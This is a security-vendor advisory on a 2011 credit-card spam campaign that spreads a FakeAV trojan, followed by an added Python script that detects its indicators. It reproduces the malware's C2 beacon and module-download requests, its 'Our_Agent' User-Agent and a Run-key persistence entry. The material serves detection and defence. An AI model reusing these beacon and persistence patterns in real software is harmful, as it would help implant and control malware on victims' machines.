Financial spam campaigns on the rise

July 8, 2011

The SonicWALL UTM Research team continued to observe an increase in financial spam campaigns pretending to come from a credit card company. The e-mail tries to grab the reader's attention by claiming that their credit card bill is overdue. The attachment, which purports to be a financial statement, is a newer variant of the FakeAV we analyzed earlier.

The spam campaign is shown below:


When executed, the attachment performs the following activities:

  • It creates the following files:
    • Start Menu\Programs\Startup\dxdiag.exe (copy of itself) [Detected as GAV: Aspxor.Y (Trojan)]
    • WINDOWS\system32\aspimgr.exe [Detected as GAV: Danmec.E (Trojan)]
    • WINDOWS\dvcbdt1.dll [Detected as GAV: Mufanom.BLDH (Trojan)]
    • %temp%\rrtegggggggg[1].exe [Detected as GAV: FakeAV.AHV (Trojan)]
    • %temp%\gggssgsdggg[1].exe [Detected as GAV: Mufanom.BLDH (Trojan)]
    • %temp%\bibalabibabuba[1].exe [Detected as GAV: Aspxor.Z (Trojan)]
  • It reports the new infection to a remote server:
    • GET /forum1/task.php?bid=462e39cb208270ad&os=5-1-2600&uptime=0&rnd=574609 HTTP/1.1
  • It downloads further components from a remote server, using a custom User-Agent string:
    • GET /forum1/load.php?module=grabbers HTTP/1.1
      User-Agent: Our_Agent
  • It creates the following registry entry so that the dropped DLL is loaded through rundll32.exe on every reboot:
    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Ulazebebebag "rundll32.exe "C:\WINDOWS\dvcbdt1.dll",Startup"
  • It displays fake scan results and bogus infection warnings, and prompts the user to purchase the product in order to clean their computer.
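The beacon, the module download and the Run-key entry above are the indicators most useful for hunting this infection on a network or a host. The following script is an added example written for this post (it is not SonicWALL's code or signature logic): it flags the `/forum1/task.php` infection report and the `/forum1/load.php` download with the `Our_Agent` User-Agent in HTTP proxy logs, and pulls the DLL and export out of a `rundll32.exe` Run-key value so it can be compared against the dropped `dvcbdt1.dll`. The proxy log format, the sample log lines and the C2 address 203.0.113.5 are constructed for the example; the post does not name the server.

```python
"""Added example: flag the FakeAV/Oficla indicators from this post in
(a) HTTP proxy logs and (b) HKCU Run-key values. Illustrative code, not
SonicWALL's signatures. The log format, the sample lines and the C2 host
203.0.113.5 (documentation range) are constructed for this example."""
import re
from urllib.parse import urlsplit, parse_qs

# Infection report seen in the post:
#   GET /forum1/task.php?bid=462e39cb208270ad&os=5-1-2600&uptime=0&rnd=574609
BEACON_PATH = "/forum1/task.php"
BEACON_PARAMS = {"bid", "os", "uptime", "rnd"}
OS_RE = re.compile(r"^\d+-\d+-\d+$")   # major-minor-build; 5-1-2600 is NT 5.1 build 2600 (Windows XP)
# Module download seen in the post, sent with the hard-coded User-Agent:
#   GET /forum1/load.php?module=grabbers   User-Agent: Our_Agent
DOWNLOAD_PATH = "/forum1/load.php"
MALWARE_UA = "Our_Agent"
# DLL the Run-key value loads via rundll32.exe
IOC_DLL = "dvcbdt1.dll"

# Constructed proxy log format: <client_ip> <method> <absolute_url> "<user-agent>"
LOG_RE = re.compile(r'^(?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$')


def classify_request(line):
    """Return an indicator dict for one proxy log line, or None if nothing matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    qs = {k: v[0] for k, v in parse_qs(url.query).items()}
    hit = {"client": m.group("client"), "c2_host": url.hostname}
    # Beacon: exact path plus all four parameters with an os value of the right shape
    if url.path == BEACON_PATH and BEACON_PARAMS <= set(qs) and OS_RE.match(qs["os"]):
        major, minor, build = qs["os"].split("-")
        hit.update(type="beacon", bot_id=qs["bid"],
                   os=f"NT {major}.{minor} build {build}", uptime=int(qs["uptime"]))
        return hit
    # Download: exact path plus the custom User-Agent
    if url.path == DOWNLOAD_PATH and m.group("ua") == MALWARE_UA:
        hit.update(type="download", module=qs.get("module", ""))
        return hit
    # The custom User-Agent on any other URL is still worth a look
    if m.group("ua") == MALWARE_UA:
        hit.update(type="suspicious_ua", path=url.path)
        return hit
    return None


def scan_log(text):
    """Run classify_request over every line and keep the hits, in log order."""
    return [h for h in (classify_request(l) for l in text.splitlines()) if h]


# rundll32.exe "C:\WINDOWS\dvcbdt1.dll",Startup  ->  ("C:\WINDOWS\dvcbdt1.dll", "Startup")
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?(?P<dll>[^",]+?)"?\s*,\s*(?P<entry>\S+)', re.IGNORECASE)


def rundll32_target(run_value):
    """Split a Run-key value that invokes rundll32 into (dll_path, export); None otherwise."""
    m = RUNDLL_RE.search(run_value)
    return (m.group("dll"), m.group("entry")) if m else None


def run_value_matches_ioc(run_value):
    """True when the Run-key value loads the dropped dvcbdt1.dll through rundll32."""
    target = rundll32_target(run_value)
    return target is not None and target[0].lower().endswith("\\" + IOC_DLL)


# Constructed sample log: one clean request, the beacon, the download, and a
# look-alike task.php request on another site that must not match.
SAMPLE_LOG = """\
10.0.0.7 GET http://www.example.com/index.html "Mozilla/5.0"
10.0.0.12 GET http://203.0.113.5/forum1/task.php?bid=462e39cb208270ad&os=5-1-2600&uptime=0&rnd=574609 "Mozilla/4.0 (compatible; MSIE 6.0)"
10.0.0.12 GET http://203.0.113.5/forum1/load.php?module=grabbers "Our_Agent"
10.0.0.9 GET http://www.example.org/forum1/task.php?id=3 "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(run_value_matches_ioc('rundll32.exe "C:\\WINDOWS\\dvcbdt1.dll",Startup'))
```

The beacon match insists on the exact path and all four parameters rather than on `task.php` alone, so ordinary forum URLs do not trip it; the `bot_id` and `c2_host` fields from the hits are what you would pivot on to find other infected clients talking to the same server.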

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Oficla.FS (Trojan)
  • GAV: Oficla.FS#email (Trojan)
  • GAV: Aspxor.Y (Trojan)
  • GAV: Aspxor.Z (Trojan)
  • GAV: Danmec.E (Trojan)
  • GAV: Mufanom.BLDH (Trojan)
  • GAV: FakeAV.AHV (Trojan)